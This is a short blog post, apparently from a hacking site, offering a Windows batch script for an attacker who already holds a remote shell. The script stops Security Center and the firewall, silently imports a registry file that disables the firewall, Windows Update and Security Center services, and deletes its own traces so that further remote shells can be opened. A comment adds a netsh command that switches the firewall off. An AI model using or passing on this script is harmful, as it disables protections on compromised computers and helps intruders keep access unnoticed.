This registry hack assumes that you already possess a remote shell and need to kill the firewall remotely (to spawn remote shells on certain egress ports). To use, save the code below into a batch file (ie down.bat) and run on the remote computer.
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO REGEDIT4
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0
May Your Skill Prevail.
2 comments:
cool - thanks for sharing.
a similar effect can be achieved via the netsh command. This was used by the PDF mailto malware which was spammed via email.
i dont know the syntax offhand .. but according to Ryan Naraine here it's:
netsh firewall set opmode mode=disable
- sandro
That is definitely a more elegant solution. Thanks for the tip!
Post a Comment